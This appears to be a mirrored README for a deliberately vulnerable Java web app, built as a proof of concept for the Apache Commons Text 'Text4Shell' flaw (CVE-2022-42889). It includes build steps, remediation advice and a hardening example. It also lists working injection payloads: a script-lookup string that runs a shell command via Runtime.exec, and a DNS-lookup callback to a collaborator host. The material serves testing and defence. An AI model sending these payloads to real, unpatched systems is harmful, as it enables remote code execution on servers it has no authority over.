
CVE-2022-42889 PoC — Apache Commons Text 代码注入漏洞

Source
Associated Vulnerability
Title: Apache Commons Text Code Injection Vulnerability (CVE-2022-42889)
Description: Apache Commons Text is a library from the Apache Software Foundation (USA) that focuses on string algorithms. Apache Commons Text versions 1.5 through 1.9 contain a security vulnerability: the default set of Lookup instances includes interpolators that can lead to arbitrary code execution or contact with remote servers, so affected applications may be exposed to remote code execution or unintended contact with remote servers.
Description
Proof of Concept Application for testing CVE-2022-42889
Readme
# CVE-2022-42889 PoC Test Application
This is a vulnerable application developed as a Proof of Concept for the vulnerability [CVE-2022-42889](https://nvd.nist.gov/vuln/detail/CVE-2022-42889). 


# Maven Installation
In order to run this you will need:
* JDK 17 or above
* Maven

1. Clone the git repo
```
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
```

2. Maven install to create the JAR

```
mvn clean install
```

This will create the `./target` folder, and within that folder should be the JAR file `text4shell-poc-0.0.1-SNAPSHOT.jar`.

3. Start the webserver

```
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar
```

This will start a web server on your `localhost` listening on port `8080` by default.

4. Browse to the webserver

Access the webserver at `http://localhost:8080/` and you should see the following output:
```
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
```

5. Exploit manually or perform a scan using [text4shell-scan](https://github.com/securekomodo/text4shell-scan)

Sample Exploit Payloads
```
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
```
```
${dns:<burp collaborator host>}
```

Recommended URL encoder for successful exploit demonstration: [https://www.urlencoder.org/](https://www.urlencoder.org/).

# Docker
Alternatively you can use Docker to be able to run this PoC:

1. Clone the git repo
```
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
```

2. Docker build

```
docker build --tag=text4shell-poc .
```

3. Docker run

```
docker run -p 80:8080 text4shell-poc
```

4. Test the vulnerable app

```
http://localhost/
```

5. The attack can be performed by passing a string of the form `${prefix:name}` as shown below:

```
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
```
```
${dns:<burp collaborator host>}
```

Recommended URL encoder for successful exploit demonstration: [https://www.urlencoder.org/](https://www.urlencoder.org/).

Alternatively, you can validate the effectiveness of scanning tools such as [text4shell-scan](https://github.com/securekomodo/text4shell-scan).


# Are You Vulnerable?
In order for your code to be vulnerable you need to:
* Be running a version of Apache `commons-text` from version `1.5.0` up to (and not including) `1.10.0`
* Be using interpolation in your `StringSubstitutor` (see [https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html](https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html)), i.e. untrusted input reaches a substitutor whose lookups include `script`, `dns` or `url` - note this is not super common


# The Fix
The fix for this is to update your instances of `commons-text` to version `1.10.0` or later, where the `script`, `dns` and `url` lookups are no longer part of the default interpolator.
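To make the two conditions above and the fix concrete, here is an added illustration (not code from the text4shell-poc project) of the vulnerable `StringSubstitutor` pattern next to a hardened one that keeps working even when upgrading is not immediately possible; the class, method names and the sample input are constructed for this example.

```java
import java.util.Map;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

/*
 * Added example, not part of the PoC repository. Shows the code pattern a
 * reviewer should look for (createInterpolator() over untrusted input) and
 * a hardened replacement that only enables an explicit allowlist of lookups.
 */
public class InterpolationHardening {

    // Constructed sample of attacker-controlled input. It only probes whether
    // the script: prefix is interpreted; it does not execute anything useful.
    static final String UNTRUSTED = "hi ${app:name}, ${script:javascript:1+1}";

    /** Vulnerable pattern on commons-text 1.5-1.9: the default interpolator
     *  includes the script, dns and url lookups, so "${script:...}" in the
     *  input is evaluated. On 1.10.0+ those lookups are no longer defaults. */
    static String vulnerable(String input) {
        return StringSubstitutor.createInterpolator().replace(input);
    }

    /** Hardened pattern: build the interpolator from an explicit map of the
     *  lookups the application actually needs and pass addDefaultLookups=false,
     *  so "${script:...}", "${dns:...}" and "${url:...}" are left unresolved
     *  regardless of the library version. */
    static String hardened(String input) {
        StringLookupFactory f = StringLookupFactory.INSTANCE;
        Map<String, StringLookup> allowed = Map.of(
            "env", f.environmentVariableStringLookup(),
            "app", f.mapStringLookup(Map.of("name", "text4shell-poc")));
        StringLookup interpolator =
            f.interpolatorStringLookup(allowed, null, false); // no default lookups
        StringSubstitutor sub = new StringSubstitutor(interpolator);
        sub.setEnableSubstitutionInVariables(false); // no nested ${...${...}} expansion
        return sub.replace(input);
    }

    public static void main(String[] args) {
        // Expected: "hi text4shell-poc, ${script:javascript:1+1}" - the probe
        // stays literal because "script" is not in the allowlist.
        System.out.println(hardened(UNTRUSTED));
    }
}
```

Grepping a code base for `createInterpolator()` and for `interpolatorStringLookup(` with `addDefaultLookups` set to `true` is a quick way to find the call sites that need either the version bump or this allowlist.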


# Author
*Bryan Smith*
* Twitter: [https://twitter.com/securekomodo](https://twitter.com/securekomodo)
File Snapshot

```
[4.0K] /data/pocs/ce3c5170f55a547bf53fd7fc58f7731cb97213c2
├── [1.4K] Dockerfile
├── [1.0K] LICENSE
├── [ 10K] mvnw
├── [6.6K] mvnw.cmd
├── [1.5K] pom.xml
├── [2.9K] README.md
└── [4.0K] src
    ├── [4.0K] main
    │   ├── [4.0K] java
    │   │   └── [4.0K] com
    │   │       └── [4.0K] securekomodo
    │   │           └── [4.0K] text4shellpoc
    │   │               ├── [4.0K] controller
    │   │               │   └── [1.6K] webController.java
    │   │               └── [ 337] Text4shellPocApplication.java
    │   └── [4.0K] resources
    │       └── [ 1] application.properties
    └── [4.0K] test
        └── [4.0K] java
            └── [4.0K] com
                └── [4.0K] securekomodo
                    └── [4.0K] text4shellpoc
                        └── [ 89] Text4shellPocApplicationTests.java

13 directories, 10 files
```